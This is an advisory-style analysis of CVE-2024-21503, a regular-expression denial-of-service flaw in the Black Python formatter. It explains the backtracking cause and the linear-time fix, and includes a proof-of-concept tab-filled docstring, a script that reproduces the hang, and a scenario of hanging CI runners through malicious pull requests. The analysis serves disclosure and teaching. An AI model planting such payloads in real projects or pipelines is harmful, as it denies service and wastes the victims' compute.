Black versions prior to 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing docstrings with specific whitespace patterns. An attacker can craft a file with thousands of tabs that causes the formatter to hang indefinitely, consuming 100% CPU. The fix involves replacing the regex engine with simple linear string manipulation.
The world's most uncompromising Python code formatter compromised its own availability with a greedy regex. A deep dive into how overlapping character classes caused catastrophic backtracking in Black.
Black describes itself as 'The uncompromising Python code formatter.' It is the gold standard in the Python ecosystem, trusted by heavyweights like Dropbox, Mozilla, and Instagram to end bike-shedding debates over code style. You run black ., and your code transforms into a uniform, PEP-8 compliant masterpiece. It is supposed to save time. It is supposed to be safe.
But here is the irony: the tool designed to rigidly enforce structure was brought to its knees by an ambiguous definition of whitespace. In CVE-2024-21503, we find a classic Regular Expression Denial of Service (ReDoS) vulnerability buried in the logic that handles—of all things—docstring indentation.
This isn't a memory corruption bug or a remote code execution via pickle deserialization. It is a logic flaw where the parser gets lost in a maze of its own making. By feeding Black a Python file containing a specific sequence of tabs and spaces, an attacker can force the formatter into an infinite loop of CPU cycles, effectively freezing any CI/CD pipeline, pre-commit hook, or web service relying on it. It turns out, being uncompromising on style requires a very compromising regex.
To understand this bug, you have to understand why Regular Expressions (regex) are often the wrong tool for the job. The vulnerability resides in src/black/strings.py, inside a function meant to expand tabs in docstrings while preserving relative indentation. The developers needed to find the first non-whitespace character in a line that might start with a mix of tabs and spaces.
They chose this regex:
FIRST_NON_WHITESPACE_RE = re.compile(r"\s*\t+\s*(\S)")At first glance, it looks harmless. It looks for whitespace (\s*), followed by at least one tab (\t+), followed by more whitespace (\s*), and finally captures a non-whitespace character ((\S)).
Here is the trap: In Python's regex engine (and many others), the character class \s (whitespace) includes \t (tab). This creates an ambiguity. If the engine sees a sequence like \t\t\t, it doesn't know if that second tab belongs to the first \s*, the middle \t+, or the final \s*.
When the regex engine encounters a string of thousands of tabs without a final non-whitespace character (which is required by the (\S) group at the end), it must backtrack. It tries to assign the first tab to group 1, then group 2. Then it tries assigning the first two tabs to group 1, and so on. The complexity explodes exponentially. This is known as Catastrophic Backtracking.
Let's look at the vulnerable code in src/black/strings.py. The function lines_with_leading_tabs_expanded iterates over lines of a docstring and applies the regex.
# Vulnerable implementation in Black < 24.3.0
def lines_with_leading_tabs_expanded(s: str) -> List[str]:
lines = []
for line in s.splitlines():
# This match attempt is where the CPU dies
match = FIRST_NON_WHITESPACE_RE.match(line)
if match:
first_non_whitespace_idx = match.start(1)
lines.append(
line[:first_non_whitespace_idx].expandtabs()
+ line[first_non_whitespace_idx:]
)
else:
lines.append(line)
return linesThe issue is strictly in FIRST_NON_WHITESPACE_RE.match(line). Because the regex is anchored to find a specific structure (tabs sandwiched by whitespace ending in a visible char), an input that almost matches but fails at the very end causes the engine to explore every possible permutation of the "sandwich" before giving up.
If you have 5,000 tabs, the number of permutations is astronomical. The computer isn't frozen; it's just working very, very hard on a problem that has no solution.
Exploiting this is trivially easy. You don't need shellcode, you don't need memory addresses, and you don't need network access. You just need to convince a developer or a server to format a file.
Imagine a large open-source project that enforces Black formatting via GitHub Actions. An attacker submits a Pull Request adding a "documentation update." The file contains a docstring with a malicious payload.
# poc.py
"""
Here is a docstring that will never finish formatting.
" + ("\t" * 10000) + "
"""When the CI runner executes black ., it hits this file. It reaches the line with 10,000 tabs. It attempts to match FIRST_NON_WHITESPACE_RE. The regex engine enters a state of deep meditation. The CI job hangs until it hits the platform's timeout (often 6 hours). If the attacker does this across multiple PRs or repositories, they can burn through the victim's compute credits or DOS their build infrastructure.
Here is a script to verify the hang locally (do not run this on production systems):
import re
import time
# The vulnerable regex
REGEX = re.compile(r"\s*\t+\s*(\S)")
# The malicious input: lots of tabs, NO non-whitespace char at the end
payload = "\t" * 5000
print("Attempting match... (Press Ctrl+C to abort)")
start = time.time()
try:
REGEX.match(payload)
except KeyboardInterrupt:
print("\nAborted!")
print(f"Finished in {time.time() - start}s")The remediation for this vulnerability is a perfect example of "Keep It Simple, Stupid." The Black maintainers realized that using a regex to find the first non-whitespace character was overkill. Python strings have built-in methods for this that are implemented in C and run in linear time.
In version 24.3.0, they completely removed the regex logic. Here is the diff from commit f00093672628d212b8965a8993cee8bedf5fe9b8:
- match = FIRST_NON_WHITESPACE_RE.match(line)
- if match:
- first_non_whitespace_idx = match.start(1)
- lines.append(
- line[:first_non_whitespace_idx].expandtabs()
- + line[first_non_whitespace_idx:]
- )
+ stripped_line = line.lstrip()
+ if not stripped_line or stripped_line == line:
+ lines.append(line)
+ else:
+ prefix_length = len(line) - len(stripped_line)
+ prefix = line[:prefix_length].expandtabs()
+ lines.append(prefix + stripped_line)Instead of a backtracking nightmare, they now just lstrip() the line. This removes all leading whitespace. By subtracting the length of the stripped line from the original line, they get the index of the first real character. Simple math. O(N) complexity. No backtracking.
This fix serves as a reminder to developers: just because you can solve it with a regex doesn't mean you should.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L| Product | Affected Versions | Fixed Version |
|---|---|---|
black Python Software Foundation | < 24.3.0 | 24.3.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-1333 (Inefficient Regular Expression Complexity) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network / Local (via file) |
| Complexity | Low |
| EPSS Score | 0.06% |
| Impact | Denial of Service (Availability) |
| Exploit Maturity | Proof of Concept Available |
The software uses a regular expression that can be forced to process input in exponential time, leading to Denial of Service.
Get the latest CVE analysis reports delivered to your inbox.